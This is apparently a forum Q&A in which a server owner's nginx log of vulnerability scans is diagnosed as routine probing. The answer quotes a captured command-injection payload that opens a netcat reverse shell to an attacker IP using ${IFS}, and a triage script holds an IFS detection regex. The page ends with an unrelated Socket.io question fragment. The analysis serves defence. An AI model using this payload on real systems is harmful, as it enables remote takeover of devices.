Here is a portion of the nginx error log on Ubuntu 18.04. There are constant HTTP requests to my Node.js server. My question is: is the server under attack? Looking online, 52.69.23.0/255.255.255.0 is a block from Tokyo, Japan.
2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
Any server connected to the public internet will be under attack on some level, even if it is not vulnerable. Internet-wide vulnerability scanning will find its way to you. The traffic indicates PHP scans and some other interesting traffic which has recently shown up on my IPS:
The host 93.174.93[.]178 sent an HTTP POST request to the destination URL "editBlackAndWhiteList" with Base64-encoded credentials:
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML Payload:
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
IFS stands for "internal field separator". It is used by the shell to determine how to do word splitting.
The default value for IFS consists of whitespace characters (space, tab, and newline). $IFS or ${IFS} is often used in command injection to replace white space. In many command-line interpreters (the shells of Unix operating systems), the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations.
$(nc 93.174.93[.]178 31337 -e $SHELL&) – Netcat Reverse Shell to host 93.174.93[.]178 on port 31337.
Fortinet has an IPS signature for this traffic, “HTTP.Unix.Shell.IFS.Remote.Code.Execution.” It indicates the detection of suspicious HTTP requests that use internal field separators.
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
Snort IPS flags this traffic under the signature "ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted."
The host is attempting to exploit a Remote Code Execution vulnerability in Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API via a hardcoded 'admin' web GUI password to get a reverse shell. Six PoCs are available on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
It would be wise to set up an IPS in front of your web server.
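Added example (not part of the original answer): a small triage script for an nginx error log in the format shown in the question, which buckets requests by probe type, flags clients that sweep many missing paths in a few seconds, and checks request text for `$IFS`/`${IFS}` tokens. The bucket names, the thresholds (5 distinct targets in 10 seconds) and the sample log entries are assumptions made for this example; the IFS check is a simple token match, not the logic of the Fortinet or Snort signatures.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# nginx error-log layout as shown in the question (timestamp, client, request).
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[error\] .*?'
    r'client: (?P<client>[^,]+), server: [^,]+, '
    r'request: "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# $IFS or ${IFS} standing in for whitespace, as the answer describes.
IFS_RE = re.compile(r'\$(?:\{IFS\}|IFS(?![A-Za-z0-9_]))')


def classify(method, target):
    """Bucket a request; the bucket names are this example's own labels."""
    if target.startswith(("http://", "https://")):
        return "proxy-check"            # absolute-form target naming another host
    path = target.split("?", 1)[0]
    if method == "POST" and path == "/editBlackAndWhiteList":
        return "dvr-api-probe"          # the DVR/NVR API URL from the answer
    if path.endswith("/wp-login.php"):
        return "wordpress-probe"
    if path.endswith("/adminer.php"):
        return "adminer-probe"
    if path.endswith(".php"):
        return "php-probe"
    return "root-fetch" if path == "/" else "other"


def parse_line(line):
    """Return a dict for an nginx [error] request line, or None for anything else."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S"),
        "client": m["client"],
        "target": m["target"],
        "kind": classify(m["method"], m["target"]),
    }


def summarize(lines):
    """Count parsed requests per bucket."""
    return dict(Counter(ev["kind"] for ev in map(parse_line, lines) if ev))


def find_scanners(lines, min_targets=5, window=timedelta(seconds=10)):
    """Clients that requested >= min_targets distinct non-root targets within window."""
    per_client = defaultdict(list)
    for ev in map(parse_line, lines):
        if ev and ev["kind"] != "root-fetch":
            per_client[ev["client"]].append(ev)
    report = {}
    for client, events in per_client.items():
        events.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end, ev in enumerate(events):
            while ev["ts"] - events[start]["ts"] > window:
                start += 1              # slide the window forward
            best = max(best, len({e["target"] for e in events[start:end + 1]}))
        if best >= min_targets:
            report[client] = {"distinct_targets": best,
                              "kinds": sorted({e["kind"] for e in events})}
    return report


def has_ifs_token(text):
    """True if URL-decoded request text (URI or body) contains $IFS or ${IFS}."""
    return IFS_RE.search(unquote_plus(text)) is not None


# Constructed sample in the question's log format; addresses are RFC 5737 documentation ranges.
def _err(ts, client, method, target, detail):
    return (f'{ts} [error] 869#0: *1 {detail}, client: {client}, server: 192.0.2.1, '
            f'request: "{method} {target} HTTP/1.1", host: "192.0.2.1"')


_MISSING = 'open() "/srv/www{}" failed (2: No such file or directory)'
_FORBIDDEN = 'directory index of "/srv/www/" is forbidden'
_PHP_PATHS = ["/TP/public/index.php", "/TP/index.php", "/thinkphp/html/public/index.php",
              "/public/index.php", "/elrekt.php", "/index.php"]
SAMPLE_LOG = [
    *[_err(f"2019/10/02 05:29:5{2 + i // 3}", "203.0.113.7", "GET", p, _MISSING.format(p))
      for i, p in enumerate(_PHP_PATHS)],
    _err("2019/10/02 05:29:54", "203.0.113.7", "GET", "/", _FORBIDDEN),
    _err("2019/10/02 16:50:44", "198.51.100.9", "POST", "/editBlackAndWhiteList",
         _MISSING.format("/editBlackAndWhiteList")),
    _err("2019/10/02 17:32:48", "192.0.2.44", "GET", "/", _FORBIDDEN),
    _err("2019/10/02 21:11:19", "198.51.100.23", "GET", "/wp-login.php",
         _MISSING.format("/wp-login.php")),
    _err("2019/10/03 07:53:00", "192.0.2.60", "HEAD", "http://198.51.100.200/", _FORBIDDEN),
    "[ E 2019-10-02 06:17:55 ] Security update check failed (non-nginx line, skipped)",
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
    print(find_scanners(SAMPLE_LOG))
```

Every probe in the sample ends in "No such file or directory" or "forbidden", which is the same outcome the question's log shows: the requests were made, but nothing was served.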
I built a chatroom app with Socket.io,
but after deploying to the production server, there are lots of errors in Nginx's log:
2016/08/07 09:15:05 [error] 14069#14069: *7875548 upstream prematurely closed connection while reading response header from upstream, client: 171.4.246.202, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10001/socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:05 [error] 14069#14069: *7875548 upstream prematurely closed connection while reading response header from upstream, client: 171.4.246.202, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10007/socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket", host: "chat.geek4it.com"
